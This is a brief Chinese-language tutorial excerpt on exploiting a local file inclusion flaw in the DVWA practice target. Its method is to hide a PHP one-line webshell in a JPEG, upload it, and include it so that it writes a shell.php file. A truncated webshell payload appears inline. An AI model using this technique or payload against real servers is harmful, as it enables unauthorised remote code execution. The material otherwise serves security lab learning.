LFI本地包含的簡單利用原理實現

一、基本思路: 1、圖片插入一句話木馬。利用上傳功能上傳此圖片。 2、利用文件包含漏洞,讀取此含有一句話木馬的圖片,生成真正shell文件,然後拿下shell。 靶機使用dvwa 二、具體步驟: 1、製作一句話圖片木馬使用edjpgcom進行製作。如圖將目標圖片拖入文件夾中的 自動打開了軟件,輸入一句話木馬 <?PHP fputs(fopen('shell.php','w'),'<?php @ev
相關文章
相關標籤/搜索